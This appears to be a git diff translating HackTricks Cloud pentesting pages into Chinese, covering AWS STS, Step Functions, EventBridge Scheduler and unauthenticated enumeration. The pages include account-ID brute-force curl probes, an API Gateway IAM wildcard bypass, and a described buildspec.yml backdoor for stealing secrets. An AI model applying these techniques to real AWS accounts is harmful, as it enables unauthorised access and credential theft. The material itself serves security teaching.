a single specific version of the state machine, but not to other aliases. They can be updated to redirect to a different version of the state machine as needed, facilitating controlled deployments and workflow management. +- **Versions**: 这些不可变的状态机快照是从该状态机的最新修订版创建的。每个版本由一个唯一的 ARN 标识,该 ARN 将状态机 ARN 与版本号组合,用冒号分隔(**`arn:aws:states:region:account-id:stateMachine:StateMachineName:version-number`**)。版本不能被编辑,但您可以更新状态机并发布新版本,或使用所需的状态机版本。 +- **Aliases**: 这些指针可以引用同一状态机的最多两个版本。可以为单个状态机创建多个别名,每个别名由一个唯一的 ARN 标识,该 ARN 通过将状态机 ARN 与别名名称组合,用冒号分隔(**`arn:aws:states:region:account-id:stateMachine:StateMachineName:aliasName`**)。别名使得在状态机的两个版本之间路由流量成为可能。或者,别名可以指向状态机的单个特定版本,但不能指向其他别名。它们可以根据需要更新以重定向到状态机的不同版本,从而促进受控部署和工作流管理。 -For more detailed information about **ASL**, check: [**Amazon States Language**](https://states-language.net/spec.html). +有关 **ASL** 的更多详细信息,请查看:[**Amazon States Language**](https://states-language.net/spec.html)。 ## IAM Roles for State machines -AWS Step Functions utilizes AWS Identity and Access Management (IAM) roles to control access to resources and actions within state machines. Here are the key aspects related to security and IAM roles in AWS Step Functions: +AWS Step Functions 利用 AWS 身份和访问管理 (IAM) 角色来控制对状态机内资源和操作的访问。以下是与 AWS Step Functions 中的安全性和 IAM 角色相关的关键方面: -- **Execution Role**: Each state machine in AWS Step Functions is associated with an IAM execution role. This role defines what actions the state machine can perform on your behalf. When a state machine transitions between states that interact with AWS services (like invoking Lambda functions, accessing DynamoDB, etc.), it assumes this execution role to carry out those actions. -- **Permissions**: The IAM execution role must be configured with permissions that allow the necessary actions on other AWS services. For example, if your state machine needs to invoke AWS Lambda functions, the IAM role must have **`lambda:InvokeFunction`** permissions. Similarly, if it needs to write to DynamoDB, appropriate permissions (**`dynamodb:PutItem`**, **`dynamodb:UpdateItem`**, etc.) must be granted. +- **Execution Role**: AWS Step Functions 中的每个状态机都与一个 IAM 执行角色相关联。该角色定义了状态机可以代表您执行的操作。当状态机在与 AWS 服务交互的状态之间转换时(例如调用 Lambda 函数、访问 DynamoDB 等),它会假定此执行角色以执行这些操作。 +- **Permissions**: IAM 执行角色必须配置具有允许对其他 AWS 服务执行必要操作的权限。例如,如果您的状态机需要调用 AWS Lambda 函数,则 IAM 角色必须具有 **`lambda:InvokeFunction`** 权限。同样,如果它需要写入 DynamoDB,则必须授予适当的权限(**`dynamodb:PutItem`**、**`dynamodb:UpdateItem`** 等)。 ## Enumeration -ReadOnlyAccess policy is enough for all the following enumeration actions. - +ReadOnlyAccess 策略足以满足所有以下枚举操作。 ```bash # State machines # @@ -310,10 +297,9 @@ aws stepfunctions describe-map-run --map-run-arn ## Lists executions of a Map Run aws stepfunctions list-executions --map-run-arn [--status-filter ] [--redrive-filter ] ``` - ## Privesc -In the following page, you can check how to **abuse Step Functions permissions to escalate privileges**: +在以下页面中,您可以查看如何**滥用 Step Functions 权限以提升特权**: {{#ref}} ../aws-privilege-escalation/aws-stepfunctions-privesc.md @@ -338,7 +324,3 @@ In the following page, you can check how to **abuse Step Functions permissions t - [https://states-language.net/spec.html](https://states-language.net/spec.html) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md index 385d55c3b..4e6f67c7e 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md @@ -4,62 +4,57 @@ ## STS -**AWS Security Token Service (STS)** is primarily designed to issue **temporary, limited-privilege credentials**. These credentials can be requested for **AWS Identity and Access Management (IAM)** users or for authenticated users (federated users). +**AWS安全令牌服务(STS)**主要用于发放**临时、有限权限的凭证**。这些凭证可以为**AWS身份与访问管理(IAM)**用户或经过身份验证的用户(联合用户)请求。 -Given that STS's purpose is to **issue credentials for identity impersonation**, the service is immensely valuable for **escalating privileges and maintaining persistence**, even though it might not have a wide array of options. +鉴于STS的目的是**发放身份冒充的凭证**,该服务对于**提升权限和维持持久性**极为重要,尽管它可能没有广泛的选项。 -### Assume Role Impersonation +### 假设角色冒充 -The action [AssumeRole](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html) provided by AWS STS is crucial as it permits a principal to acquire credentials for another principal, essentially impersonating them. Upon invocation, it responds with an access key ID, a secret key, and a session token corresponding to the specified ARN. +AWS STS提供的[AssumeRole](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html)操作至关重要,因为它允许一个主体获取另一个主体的凭证,实质上冒充他们。调用时,它会返回一个访问密钥ID、一个秘密密钥和一个与指定ARN对应的会话令牌。 -For Penetration Testers or Red Team members, this technique is instrumental for privilege escalation (as elaborated [**here**](../aws-privilege-escalation/aws-sts-privesc.md#sts-assumerole)). However, it's worth noting that this technique is quite conspicuous and may not catch an attacker off guard. +对于渗透测试人员或红队成员来说,这种技术对于权限提升至关重要(如[**这里**](../aws-privilege-escalation/aws-sts-privesc.md#sts-assumerole)所述)。然而,值得注意的是,这种技术相当显眼,可能不会让攻击者感到意外。 -#### Assume Role Logic - -In order to assume a role in the same account if the **role to assume is allowing specifically a role ARN** like in: +#### 假设角色逻辑 +为了在同一账户中假设角色,如果**要假设的角色特别允许一个角色ARN**,如: ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam:::role/priv-role" - }, - "Action": "sts:AssumeRole", - "Condition": {} - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam:::role/priv-role" +}, +"Action": "sts:AssumeRole", +"Condition": {} +} +] } ``` +在这种情况下,角色 **`priv-role`** **不需要被特别允许** 来承担该角色(只需有该允许即可)。 -The role **`priv-role`** in this case, **doesn't need to be specifically allowed** to assume that role (with that allowance is enough). - -However, if a role is allowing an account to assume it, like in: - +但是,如果一个角色允许一个账户承担它,比如在: ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam:::root" - }, - "Action": "sts:AssumeRole", - "Condition": {} - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam:::root" +}, +"Action": "sts:AssumeRole", +"Condition": {} +} +] } ``` +该角色尝试假设它将需要一个 **特定的 `sts:AssumeRole` 权限** 来 **假设它**。 -The role trying to assume it will need a **specific `sts:AssumeRole` permission** over that role **to assume it**. - -If you try to assume a **role** **from a different account**, the **assumed role must allow it** (indicating the role **ARN** or the **external account**), and the **role trying to assume** the other one **MUST** to h**ave permissions to assume it** (in this case this isn't optional even if the assumed role is specifying an ARN). +如果您尝试从 **不同的账户** 假设一个 **角色**,则 **被假设的角色必须允许它**(指明角色的 **ARN** 或 **外部账户**),并且 **尝试假设** 另一个角色的 **角色必须** 具备 **假设它的权限**(在这种情况下,即使被假设的角色指定了 ARN,这也不是可选的)。 ### Enumeration - ```bash # Get basic info of the creds aws sts get-caller-identity @@ -72,33 +67,28 @@ aws sts get-session-token ## MFA aws sts get-session-token --serial-number --token-code ``` +### 提权 -### Privesc - -In the following page you can check how to **abuse STS permissions to escalate privileges**: +在以下页面中,您可以查看如何**滥用 STS 权限以提升权限**: {{#ref}} ../aws-privilege-escalation/aws-sts-privesc.md {{#endref}} -### Post Exploitation +### 后期利用 {{#ref}} ../aws-post-exploitation/aws-sts-post-exploitation.md {{#endref}} -### Persistence +### 持久性 {{#ref}} ../aws-persistence/aws-sts-persistence.md {{#endref}} -## References +## 参考 - [https://blog.christophetd.fr/retrieving-aws-security-credentials-from-the-aws-console/?utm_source=pocket_mylist](https://blog.christophetd.fr/retrieving-aws-security-credentials-from-the-aws-console/?utm_source=pocket_mylist) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md b/src/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md index a2f2e0c2f..1264b748c 100644 --- a/src/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md @@ -6,49 +6,48 @@ ## EventBridge Scheduler -**Amazon EventBridge Scheduler** is a fully managed, **serverless scheduler designed to create, run, and manage tasks** at scale. It enables you to schedule millions of tasks across over 270 AWS services and 6,000+ API operations, all from a central service. With built-in reliability and no infrastructure to manage, EventBridge Scheduler simplifies scheduling, reduces maintenance costs, and scales automatically to meet demand. You can configure cron or rate expressions for recurring schedules, set one-time invocations, and define flexible delivery windows with retry options, ensuring tasks are reliably delivered based on the availability of downstream targets. +**Amazon EventBridge Scheduler** 是一个完全托管的 **无服务器调度程序,旨在大规模创建、运行和管理任务**。它使您能够在超过 270 个 AWS 服务和 6,000 多个 API 操作中调度数百万个任务,所有这些都来自一个中央服务。凭借内置的可靠性和无需管理的基础设施,EventBridge Scheduler 简化了调度,降低了维护成本,并自动扩展以满足需求。您可以为重复调度配置 cron 或速率表达式,设置一次性调用,并定义灵活的交付窗口和重试选项,确保任务根据下游目标的可用性可靠交付。 -There is an initial limit of 1,000,000 schedules per region per account. Even the official quotas page suggests, "It's recommended to delete one-time schedules once they've completed." +每个区域每个账户的初始调度限制为 1,000,000。甚至官方配额页面也建议:“建议在一次性调度完成后将其删除。” ### Types of Schedules -Types of Schedules in EventBridge Scheduler: +EventBridge Scheduler 中的调度类型: -1. **One-time schedules** – Execute a task at a specific time, e.g., December 21st at 7 AM UTC. -2. **Rate-based schedules** – Set recurring tasks based on a frequency, e.g., every 2 hours. -3. **Cron-based schedules** – Set recurring tasks using a cron expression, e.g., every Friday at 4 PM. +1. **一次性调度** – 在特定时间执行任务,例如,12 月 21 日 UTC 时间上午 7 点。 +2. **基于速率的调度** – 根据频率设置重复任务,例如,每 2 小时一次。 +3. **基于 cron 的调度** – 使用 cron 表达式设置重复任务,例如,每周五下午 4 点。 -Two Mechanisms for Handling Failed Events: +处理失败事件的两种机制: -1. **Retry Policy** – Defines the number of retry attempts for a failed event and how long to keep it unprocessed before considering it a failure. -2. **Dead-Letter Queue (DLQ)** – A standard Amazon SQS queue where failed events are delivered after retries are exhausted. DLQs help in troubleshooting issues with your schedule or its downstream target. +1. **重试策略** – 定义失败事件的重试尝试次数以及在将其视为失败之前保持未处理的时间。 +2. **死信队列 (DLQ)** – 标准的 Amazon SQS 队列,在重试耗尽后将失败事件传递到此队列。DLQ 有助于排查调度或其下游目标的问题。 ### Targets -There are 2 types of targets for a scheduler [**templated (docs)**](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html), which are commonly used and AWS made them easier to configure, and [**universal (docs)**](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html), which can be used to call any AWS API. +调度程序有 2 种类型的目标 [**模板化 (docs)**](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html),这些目标常用且 AWS 使其更易于配置,以及 [**通用 (docs)**](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html),可用于调用任何 AWS API。 -**Templated targets** support the following services: +**模板化目标** 支持以下服务: - CodeBuild – StartBuild - CodePipeline – StartPipelineExecution - Amazon ECS – RunTask - - Parameters: EcsParameters +- Parameters: EcsParameters - EventBridge – PutEvents - - Parameters: EventBridgeParameters +- Parameters: EventBridgeParameters - Amazon Inspector – StartAssessmentRun - Kinesis – PutRecord - - Parameters: KinesisParameters +- Parameters: KinesisParameters - Firehose – PutRecord - Lambda – Invoke - SageMaker – StartPipelineExecution - - Parameters: SageMakerPipelineParameters +- Parameters: SageMakerPipelineParameters - Amazon SNS – Publish - Amazon SQS – SendMessage - - Parameters: SqsParameters +- Parameters: SqsParameters - Step Functions – StartExecution ### Enumeration - ```bash # List all EventBridge Scheduler schedules aws scheduler list-schedules @@ -65,10 +64,9 @@ aws scheduler get-schedule-group --name # List tags for a specific schedule (helpful in identifying any custom tags or permissions) aws scheduler list-tags-for-resource --resource-arn ``` - ### Privesc -In the following page, you can check how to **abuse eventbridge scheduler permissions to escalate privileges**: +在以下页面中,您可以查看如何**滥用 eventbridge 调度程序权限以提升权限**: {{#ref}} ../aws-privilege-escalation/eventbridgescheduler-privesc.md @@ -79,7 +77,3 @@ In the following page, you can check how to **abuse eventbridge scheduler permis - [https://docs.aws.amazon.com/scheduler/latest/UserGuide/what-is-scheduler.html](https://docs.aws.amazon.com/scheduler/latest/UserGuide/what-is-scheduler.html) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md index 0003290b4..adb20e419 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md @@ -1,58 +1,54 @@ -# AWS - Unauthenticated Enum & Access +# AWS - 未认证枚举与访问 {{#include ../../../banners/hacktricks-training.md}} -## AWS Credentials Leaks +## AWS 凭证泄露 -A common way to obtain access or information about an AWS account is by **searching for leaks**. You can search for leaks using **google dorks**, checking the **public repos** of the **organization** and the **workers** of the organization in **Github** or other platforms, searching in **credentials leaks databases**... or in any other part you think you might find any information about the company and its cloud infa.\ -Some useful **tools**: +获取 AWS 账户访问或信息的常见方法是通过 **搜索泄露**。您可以使用 **google dorks** 搜索泄露,检查 **组织** 和 **组织员工** 在 **Github** 或其他平台上的 **公共仓库**,在 **凭证泄露数据库** 中搜索……或在您认为可能找到公司及其云基础设施信息的任何其他地方。\ +一些有用的 **工具**: - [https://github.com/carlospolop/leakos](https://github.com/carlospolop/leakos) - [https://github.com/carlospolop/pastos](https://github.com/carlospolop/pastos) - [https://github.com/carlospolop/gorks](https://github.com/carlospolop/gorks) -## AWS Unauthenticated Enum & Access +## AWS 未认证枚举与访问 -There are several services in AWS that could be configured giving some kind of access to all Internet or to more people than expected. Check here how: +AWS 中有几个服务可以配置,使其对所有互联网用户或比预期更多的人开放访问。查看以下内容了解如何: -- [**Accounts Unauthenticated Enum**](aws-accounts-unauthenticated-enum.md) -- [**Cloud9 Unauthenticated Enum**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/broken-reference/README.md) -- [**Cloudfront Unauthenticated Enum**](aws-cloudfront-unauthenticated-enum.md) -- [**Cloudsearch Unauthenticated Enum**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/broken-reference/README.md) -- [**Cognito Unauthenticated Enum**](aws-cognito-unauthenticated-enum.md) -- [**DocumentDB Unauthenticated Enum**](aws-documentdb-enum.md) -- [**EC2 Unauthenticated Enum**](aws-ec2-unauthenticated-enum.md) -- [**Elasticsearch Unauthenticated Enum**](aws-elasticsearch-unauthenticated-enum.md) -- [**IAM Unauthenticated Enum**](aws-iam-and-sts-unauthenticated-enum.md) -- [**IoT Unauthenticated Access**](aws-iot-unauthenticated-enum.md) -- [**Kinesis Video Unauthenticated Access**](aws-kinesis-video-unauthenticated-enum.md) -- [**Media Unauthenticated Access**](aws-media-unauthenticated-enum.md) -- [**MQ Unauthenticated Access**](aws-mq-unauthenticated-enum.md) -- [**MSK Unauthenticated Access**](aws-msk-unauthenticated-enum.md) -- [**RDS Unauthenticated Access**](aws-rds-unauthenticated-enum.md) -- [**Redshift Unauthenticated Access**](aws-redshift-unauthenticated-enum.md) -- [**SQS Unauthenticated Access**](aws-sqs-unauthenticated-enum.md) -- [**S3 Unauthenticated Access**](aws-s3-unauthenticated-enum.md) +- [**账户未认证枚举**](aws-accounts-unauthenticated-enum.md) +- [**Cloud9 未认证枚举**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/broken-reference/README.md) +- [**Cloudfront 未认证枚举**](aws-cloudfront-unauthenticated-enum.md) +- [**Cloudsearch 未认证枚举**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/broken-reference/README.md) +- [**Cognito 未认证枚举**](aws-cognito-unauthenticated-enum.md) +- [**DocumentDB 未认证枚举**](aws-documentdb-enum.md) +- [**EC2 未认证枚举**](aws-ec2-unauthenticated-enum.md) +- [**Elasticsearch 未认证枚举**](aws-elasticsearch-unauthenticated-enum.md) +- [**IAM 未认证枚举**](aws-iam-and-sts-unauthenticated-enum.md) +- [**IoT 未认证访问**](aws-iot-unauthenticated-enum.md) +- [**Kinesis Video 未认证访问**](aws-kinesis-video-unauthenticated-enum.md) +- [**Media 未认证访问**](aws-media-unauthenticated-enum.md) +- [**MQ 未认证访问**](aws-mq-unauthenticated-enum.md) +- [**MSK 未认证访问**](aws-msk-unauthenticated-enum.md) +- [**RDS 未认证访问**](aws-rds-unauthenticated-enum.md) +- [**Redshift 未认证访问**](aws-redshift-unauthenticated-enum.md) +- [**SQS 未认证访问**](aws-sqs-unauthenticated-enum.md) +- [**S3 未认证访问**](aws-s3-unauthenticated-enum.md) -## Cross Account Attacks +## 跨账户攻击 -In the talk [**Breaking the Isolation: Cross-Account AWS Vulnerabilities**](https://www.youtube.com/watch?v=JfEFIcpJ2wk) it's presented how some services allow(ed) any AWS account accessing them because **AWS services without specifying accounts ID** were allowed. +在演讲 [**打破隔离:跨账户 AWS 漏洞**](https://www.youtube.com/watch?v=JfEFIcpJ2wk) 中,展示了一些服务如何允许任何 AWS 账户访问它们,因为 **未指定账户 ID 的 AWS 服务** 是被允许的。 -During the talk they specify several examples, such as S3 buckets **allowing cloudtrai**l (of **any AWS** account) to **write to them**: +在演讲中,他们列举了几个例子,例如 S3 存储桶 **允许 cloudtrail**(来自 **任何 AWS** 账户)**写入它们**: ![](<../../../images/image (260).png>) -Other services found vulnerable: +其他发现存在漏洞的服务: - AWS Config - Serverless repository -## Tools +## 工具 -- [**cloud_enum**](https://github.com/initstring/cloud_enum): Multi-cloud OSINT tool. **Find public resources** in AWS, Azure, and Google Cloud. Supported AWS services: Open / Protected S3 Buckets, awsapps (WorkMail, WorkDocs, Connect, etc.) +- [**cloud_enum**](https://github.com/initstring/cloud_enum):多云 OSINT 工具。**查找公共资源** 在 AWS、Azure 和 Google Cloud。支持的 AWS 服务:开放/受保护的 S3 存储桶,awsapps(WorkMail、WorkDocs、Connect 等) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md index 84c70ed0e..49fb47b42 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md @@ -2,14 +2,13 @@ {{#include ../../../banners/hacktricks-training.md}} -## Account IDs +## 账户 ID -If you have a target there are ways to try to identify account IDs of accounts related to the target. +如果你有一个目标,有一些方法可以尝试识别与该目标相关的账户 ID。 -### Brute-Force - -You create a list of potential account IDs and aliases and check them +### 暴力破解 +你创建一个潜在账户 ID 和别名的列表并进行检查。 ```bash # Check if an account ID exists curl -v https://.signin.aws.amazon.com @@ -17,33 +16,28 @@ curl -v https://.signin.aws.amazon.com ## It also works from account aliases curl -v https://vodafone-uk2.signin.aws.amazon.com ``` - -You can [automate this process with this tool](https://github.com/dagrz/aws_pwn/blob/master/reconnaissance/validate_accounts.py). +您可以 [使用此工具自动化此过程](https://github.com/dagrz/aws_pwn/blob/master/reconnaissance/validate_accounts.py)。 ### OSINT -Look for urls that contains `.signin.aws.amazon.com` with an **alias related to the organization**. +查找包含 `.signin.aws.amazon.com` 的网址,**与组织相关的别名**。 ### Marketplace -If a vendor has **instances in the marketplace,** you can get the owner id (account id) of the AWS account he used. +如果供应商在 **市场中有实例,** 您可以获取他使用的 AWS 账户的所有者 ID(账户 ID)。 ### Snapshots -- Public EBS snapshots (EC2 -> Snapshots -> Public Snapshots) -- RDS public snapshots (RDS -> Snapshots -> All Public Snapshots) -- Public AMIs (EC2 -> AMIs -> Public images) +- 公共 EBS 快照 (EC2 -> Snapshots -> Public Snapshots) +- RDS 公共快照 (RDS -> Snapshots -> All Public Snapshots) +- 公共 AMI (EC2 -> AMIs -> Public images) ### Errors -Many AWS error messages (even access denied) will give that information. +许多 AWS 错误消息(甚至访问被拒绝)将提供该信息。 ## References - [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md index 5a69bebe0..6fb3105dd 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md @@ -2,59 +2,51 @@ {{#include ../../../banners/hacktricks-training.md}} -### API Invoke bypass - -According to the talk [Attack Vectors for APIs Using AWS API Gateway Lambda Authorizers - Alexandre & Leonardo](https://www.youtube.com/watch?v=bsPKk7WDOnE), Lambda Authorizers can be configured **using IAM syntax** to give permissions to invoke API endpoints. This is taken [**from the docs**](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-control-access-using-iam-policies-to-invoke-api.html): +### API 调用绕过 +根据演讲 [使用 AWS API Gateway Lambda 授权者的攻击向量 - Alexandre & Leonardo](https://www.youtube.com/watch?v=bsPKk7WDOnE),Lambda 授权者可以 **使用 IAM 语法** 配置以授予调用 API 端点的权限。这是 [**来自文档**](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-control-access-using-iam-policies-to-invoke-api.html): ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Permission", - "Action": ["execute-api:Execution-operation"], - "Resource": [ - "arn:aws:execute-api:region:account-id:api-id/stage/METHOD_HTTP_VERB/Resource-path" - ] - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Permission", +"Action": ["execute-api:Execution-operation"], +"Resource": [ +"arn:aws:execute-api:region:account-id:api-id/stage/METHOD_HTTP_VERB/Resource-path" +] +} +] } ``` +给端点调用权限的这种方式的问题在于**"\*"意味着"任何"**,并且**不再支持正则表达式语法**。 -The problem with this way to give permissions to invoke endpoints is that the **"\*" implies "anything"** and there is **no more regex syntax supported**. +一些例子: -Some examples: - -- A rule such as `arn:aws:execute-apis:sa-east-1:accid:api-id/prod/*/dashboard/*` in order to give each user access to `/dashboard/user/{username}` will give them access to other routes such as `/admin/dashboard/createAdmin` for example. +- 规则如`arn:aws:execute-apis:sa-east-1:accid:api-id/prod/*/dashboard/*`为了给每个用户访问`/dashboard/user/{username}`的权限,将会使他们访问其他路由,例如`/admin/dashboard/createAdmin`。 > [!WARNING] -> Note that **"\*" doesn't stop expanding with slashes**, therefore, if you use "\*" in api-id for example, it could also indicate "any stage" or "any method" as long as the final regex is still valid.\ -> So `arn:aws:execute-apis:sa-east-1:accid:*/prod/GET/dashboard/*`\ -> Can validate a post request to test stage to the path `/prod/GET/dashboard/admin` for example. +> 请注意**"\*"不会因斜杠而停止扩展**,因此,如果您在api-id中使用"\*",它也可能表示"任何阶段"或"任何方法",只要最终的正则表达式仍然有效。\ +> 所以`arn:aws:execute-apis:sa-east-1:accid:*/prod/GET/dashboard/*`\ +> 可以验证对路径`/prod/GET/dashboard/admin`的测试阶段的post请求。 -You should always have clear what you want to allow to access and then check if other scenarios are possible with the permissions granted. +您应该始终清楚您想要允许访问的内容,然后检查授予的权限是否可能存在其他场景。 -For more info, apart of the [**docs**](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-control-access-using-iam-policies-to-invoke-api.html), you can find code to implement authorizers in [**this official aws github**](https://github.com/awslabs/aws-apigateway-lambda-authorizer-blueprints/tree/master/blueprints). +有关更多信息,除了[**文档**](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-control-access-using-iam-policies-to-invoke-api.html),您可以在[**这个官方aws github**](https://github.com/awslabs/aws-apigateway-lambda-authorizer-blueprints/tree/master/blueprints)中找到实现授权者的代码。 -### IAM Policy Injection +### IAM策略注入 -In the same [**talk** ](https://www.youtube.com/watch?v=bsPKk7WDOnE)it's exposed the fact that if the code is using **user input** to **generate the IAM policies**, wildcards (and others such as "." or specific strings) can be included in there with the goal of **bypassing restrictions**. - -### Public URL template +在同一个[**演讲**](https://www.youtube.com/watch?v=bsPKk7WDOnE)中,暴露了如果代码使用**用户输入**来**生成IAM策略**,则可以在其中包含通配符(以及其他如"."或特定字符串),目的是**绕过限制**。 +### 公共URL模板 ``` https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided} ``` +### 从公共 API Gateway URL 获取账户 ID -### Get Account ID from public API Gateway URL +就像 S3 存储桶、数据交换和 Lambda URL 网关一样,可以通过公共 API Gateway URL 利用 **`aws:ResourceAccount`** **策略条件键** 找到账户的账户 ID。这是通过逐个字符查找账户 ID,利用策略中 **`aws:ResourceAccount`** 部分的通配符来实现的。\ +此技术还允许获取 **标签的值**,如果你知道标签键(有一些默认的有趣标签)。 -Just like with S3 buckets, Data Exchange and Lambda URLs gateways, It's possible to find the account ID of an account abusing the **`aws:ResourceAccount`** **Policy Condition Key** from a public API Gateway URL. This is done by finding the account ID one character at a time abusing wildcards in the **`aws:ResourceAccount`** section of the policy.\ -This technique also allows to get **values of tags** if you know the tag key (there some default interesting ones). - -You can find more information in the [**original research**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) and the tool [**conditional-love**](https://github.com/plerionhq/conditional-love/) to automate this exploitation. +你可以在 [**原始研究**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) 和工具 [**conditional-love**](https://github.com/plerionhq/conditional-love/) 中找到更多信息,以自动化此利用。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md index 0284e2514..6d5409862 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md @@ -2,14 +2,8 @@ {{#include ../../../banners/hacktricks-training.md}} -### Public URL template - +### 公共 URL 模板 ``` https://{random_id}.cloudfront.net ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md index d95410a62..3094e83f3 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md @@ -1,10 +1,10 @@ -# AWS - CodeBuild Unauthenticated Access +# AWS - CodeBuild 未认证访问 {{#include ../../../banners/hacktricks-training.md}} ## CodeBuild -For more info check this page: +有关更多信息,请查看此页面: {{#ref}} ../aws-services/aws-codebuild-enum.md @@ -12,28 +12,22 @@ For more info check this page: ### buildspec.yml -If you compromise write access over a repository containing a file named **`buildspec.yml`**, you could **backdoor** this file, which specifies the **commands that are going to be executed** inside a CodeBuild project and exfiltrate the secrets, compromise what is done and also compromise the **CodeBuild IAM role credentials**. +如果您获得了对包含名为 **`buildspec.yml`** 文件的存储库的写入访问权限,您可以 **后门** 此文件,该文件指定将在 CodeBuild 项目中执行的 **命令** 并提取机密,妥协所做的事情,还可以妥协 **CodeBuild IAM 角色凭证**。 -Note that even if there isn't any **`buildspec.yml`** file but you know Codebuild is being used (or a different CI/CD) **modifying some legit code** that is going to be executed can also get you a reverse shell for example. +请注意,即使没有 **`buildspec.yml`** 文件,但您知道正在使用 Codebuild(或其他 CI/CD),**修改一些合法代码** 也可以让您获得反向 shell,例如。 -For some related information you could check the page about how to attack Github Actions (similar to this): +有关一些相关信息,您可以查看关于如何攻击 Github Actions 的页面(与此类似): {{#ref}} ../../../pentesting-ci-cd/github-security/abusing-github-actions/ {{#endref}} -## Self-hosted GitHub Actions runners in AWS CodeBuild - -As [**indicated in the docs**](https://docs.aws.amazon.com/codebuild/latest/userguide/action-runner.html), It's possible to configure **CodeBuild** to run **self-hosted Github actions** when a workflow is triggered inside a Github repo configured. This can be detected checking the CodeBuild project configuration because the **`Event type`** needs to contain: **`WORKFLOW_JOB_QUEUED`** and in a Github Workflow because it will select a **self-hosted** runner like this: +## 在 AWS CodeBuild 中自托管的 GitHub Actions 运行器 +正如 [**文档中所示**](https://docs.aws.amazon.com/codebuild/latest/userguide/action-runner.html),可以配置 **CodeBuild** 在配置的 Github 存储库中触发工作流时运行 **自托管的 Github actions**。这可以通过检查 CodeBuild 项目配置来检测,因为 **`事件类型`** 需要包含:**`WORKFLOW_JOB_QUEUED`**,并且在 Github 工作流中,因为它将选择一个 **自托管** 运行器,如下所示: ```bash runs-on: codebuild--${{ github.run_id }}-${{ github.run_attempt }} ``` - -This new relationship between Github Actions and AWS creates another way to compromise AWS from Github as the 